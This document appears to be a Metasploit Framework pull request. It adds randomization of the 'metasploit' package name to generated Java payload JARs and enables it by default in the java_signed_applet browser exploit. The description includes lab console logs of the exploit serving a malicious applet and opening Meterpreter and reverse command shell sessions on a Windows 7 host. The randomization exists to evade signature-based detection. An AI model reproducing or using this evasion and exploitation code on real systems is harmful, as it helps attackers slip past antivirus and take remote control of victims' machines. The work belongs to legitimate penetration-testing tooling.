### PR TITLE
Add randomization to Rex::Zip::Jar and java_signed_applet

### DIFF
--- a/lib/msf/core/payload/java.rb
+++ b/lib/msf/core/payload/java.rb
@@ -42,6 +42,8 @@ module Msf::Payload::Java
   #
   # @option opts :main_class [String] the name of the Main-Class
   #   attribute in the manifest.  Defaults to "metasploit.Payload"
+  # @option opts :random [Boolean] Set to `true` to randomize the
+  #   "metasploit" package name.
   # @return [Rex::Zip::Jar]
   def generate_jar(opts={})
     raise if not respond_to? :config
@@ -54,6 +56,7 @@ module Msf::Payload::Java
     ] + @class_files
 
     jar = Rex::Zip::Jar.new
+    jar.add_sub("metasploit") if opts[:random]
     jar.add_file("metasploit.dat", config)
     jar.add_files(paths, File.join(Msf::Config.data_directory, "java"))
     jar.build_manifest(:main_class => main_class)

--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -961,6 +961,7 @@ require 'msf/core/exe/segment_injector'
     spawn = opts[:spawn] || 2
     exe_name = Rex::Text.rand_text_alpha(8) + ".exe"
     zip = Rex::Zip::Jar.new
+    zip.add_sub("metasploit") if opts[:random]
     paths = [
       [ "metasploit", "Payload.class" ],
     ]

--- a/lib/rex/zip/jar.rb
+++ b/lib/rex/zip/jar.rb
@@ -15,6 +15,17 @@ module Zip
 #
 class Jar < Archive
   attr_accessor :manifest
+  # @!attribute [rw] substitutions
+  #   The substitutions to apply when randomizing. Randomization is designed to
+  #   be used in packages and/or classes names.
+  #
+  #   @return [Hash]
+  attr_accessor :substitutions
+
+  def initialize
+    @substitutions = {}
+    super
+  end
 
   #
   # Create a MANIFEST.MF file based on the current Archive#entries.
@@ -35,8 +46,8 @@ class Jar < Archive
   # The SHA1-Digest lines are optional unless the jar is signed (see #sign).
   #
   def build_manifest(opts={})
-    main_class = opts[:main_class] || nil
-    app_name = opts[:app_name] || nil
+    main_class = (opts[:main_class] ? randomize(opts[:main_class]) : nil)
+    app_name = (opts[:app_name] ? randomize(opts[:main_class]) : nil)
     existing_manifest = nil
 
     @manifest =  "Manifest-Version: 1.0\r\n"
@@ -222,6 +233,47 @@ class Jar < Archive
     add_file("META-INF/SIGNFILE.#{sigalg}", signature.to_der)
 
     return true
+  end
+
+  # Adds a file to the JAR, randomizing the file name
+  # and the contents.
+  #
+  # @see Rex::Zip::Archive#add_file
+  def add_file(fname, fdata=nil, xtra=nil, comment=nil)
+    super(randomize(fname), randomize(fdata), xtra, comment)
+  end
+
+  # Adds a substitution to have into account when randomizing. Substitutions
+  # must be added immediately after {#initialize}.
+  #
+  # @param str [String] String to substitute. It's designed to randomize
+  #   class and/or package names.
+  # @param bad [String] String containing bad characters to avoid when
+  #   applying substitutions.
+  # @return [String] The substitution which will be used when randomizing.
+  def add_sub(str, bad = '')
+    if @substitutions.key?(str)
+      return @substitutions[str]
+    end
+
+    @substitutions[str] = Rex::Text.rand_text_alpha(str.length, bad)
+  end
+
+  # Randomizes an input by applying the `substitutions` available.
+  #
+  # @param str [String] String to randomize.
+  # @return [String] The input `str` with all the possible `substitutions`
+  #   applied.
+  def randomize(str)
+    return str if str.nil?
+
+    random = str
+
+    @substitutions.each do |orig, subs|
+      random = str.gsub(orig, subs)
+    end
+
+    random
   end
 
 end

--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -134,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # If we haven't returned yet, then this is a request for our applet
     # jar, build one for this victim.
-    jar = p.encoded_jar
+    jar = p.encoded_jar(:random => true)
 
     jar.add_file("#{datastore["APPLETNAME"]}.class", @applet_class)
 

--- a/modules/payloads/singles/java/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/java/shell_reverse_tcp.rb
@@ -43,6 +43,7 @@ module Metasploit3
 
   def generate_jar(opts={})
     jar = Rex::Zip::Jar.new
+    jar.add_sub("metasploit") if opts[:random]
     @class_files.each do |path|
       1.upto(path.length - 1) do |idx|
         full = path[0,idx].join("/") + "/"


### PR DESCRIPTION
Pete (from the pentesting team) and @jlee-r7 had a great idea of adding by default randomization of the package name (metasploit) to the java_signed_applet module. Pete worked in a first code, which can be found in this branch: https://github.com/jvazquez-r7/metasploit-framework/tree/java_signed_applet_random_class

This pull request tries to make a pull request to provide the intended feature, but trying to keep the current framework behaviour when generating jar's, with the hope of not breaking nothing with the current modification.

This pull request:
- Adds the randomisation layer to `Rex::Zip::Jar`. 
- Allows java payloads providing `generate_jar` and `Msf::Util::Exe#generate_jar` the capability to randomise the package name ("metasploit") with an easy `:random` option.
- Modifies java_signed_applet to randomise the package name (`metasploit`) by deafult.
## Verification
- [x] Use exploit/multi/browser/java_signed_applet with a native paylaod (windows/meterpreter/reverse_tcp) by default. It should get a session.

```
msf > use exploit/multi/browser/java_signed_applet 
msf exploit(java_signed_applet) > set srvhost 192.168.172.1
srvhost => 192.168.172.1
msf exploit(java_signed_applet) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://192.168.172.1:8080/VaZMGDdJ
[*] Server started.
msf exploit(java_signed_applet) > [*] 192.168.172.133  java_signed_applet - Handling request
[*] 192.168.172.133  java_signed_applet - Sending SiteLoader.jar. Waiting for user to click 'accept'...
[*] 192.168.172.133  java_signed_applet - Sending SiteLoader.jar. Waiting for user to click 'accept'...
[*] Sending stage (769024 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:50294) at 2014-02-27 12:32:37 -0600

msf exploit(java_signed_applet) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.133 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(java_signed_applet) > jobs -K
Stopping all jobs...

[*] Server stopped.
[*] Server stopped.
msf exploit(java_signed_applet) > 
```
- [x] Use exploit/multi/browser/java_signed_applet with a java/meterpreter/reverse_tcp. It should get a session.

```
msf exploit(java_signed_applet) > set target 0
target => 0
msf exploit(java_signed_applet) > set payload java/meterpreter/reverse_tcp 
payload => java/meterpreter/reverse_tcp
msf exploit(java_signed_applet) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://192.168.172.1:8080/XPuCSeb
[*] Server started.
msf exploit(java_signed_applet) > 
[*] 192.168.172.133  java_signed_applet - Handling request
[*] 192.168.172.133  java_signed_applet - Sending SiteLoader.jar. Waiting for user to click 'accept'...
[*] 192.168.172.133  java_signed_applet - Sending SiteLoader.jar. Waiting for user to click 'accept'...
[*] Sending stage (30355 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:50301) at 2014-02-27 12:35:46 -0600

msf exploit(java_signed_applet) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer    : WIN-RNJ7NBRK9L7
OS          : Windows 7 6.1 (x86)
Meterpreter : java/java
emeterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.6.0.165 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(java_signed_applet) > 
```
- [x] Use exploit/multi/browser/java_signed_applet with java/shell_reverse_tcp. It should get a session

```
msf exploit(java_signed_applet) > set payload java/shell_reverse_tcp 
payload => java/shell_reverse_tcp
msf exploit(java_signed_applet) > exploit
[*] Exploit running as background job.

[-] Handler failed to bind to 10.6.0.165:4444
[*] Started reverse handler on 0.0.0.0:4444 
[*] Using URL: http://192.168.172.1:8080/WNHryjRPu
[*] Server started.
msf exploit(java_signed_applet) > jobs -K
Stopping all jobs...
[*] Server stopped.
[*] Server stopped.
msf exploit(java_signed_applet) > sessions -K
[*] Killing all sessions...
msf exploit(java_signed_applet) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://192.168.172.1:8080/qd8AaT6w
[*] Server started.
msf exploit(java_signed_applet) > [*] 192.168.172.133  java_signed_applet - Handling request
[*] 192.168.172.133  java_signed_applet - Sending SiteLoader.jar. Waiting for user to click 'accept'...
[*] 192.168.172.133  java_signed_applet - Sending SiteLoader.jar. Waiting for user to click 'accept'...
[*] Command shell session 3 opened (10.6.0.165:4444 -> 10.6.0.165:50309) at 2014-02-27 12:37:05 -0600

msf exploit(java_signed_applet) > sessions -i 3
[*] Starting interaction with 3...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Juan Vazquez\Desktop>exit  
exit

[*] 10.6.0.165 - Command shell session 3 closed.  Reason: Died from EOFError

```
- [x] Get any of the generated JAR's and confirm with the "metasploit" package isn't used anymore. But a random package name.
- [x] Try to use any other Java module, should work as before.
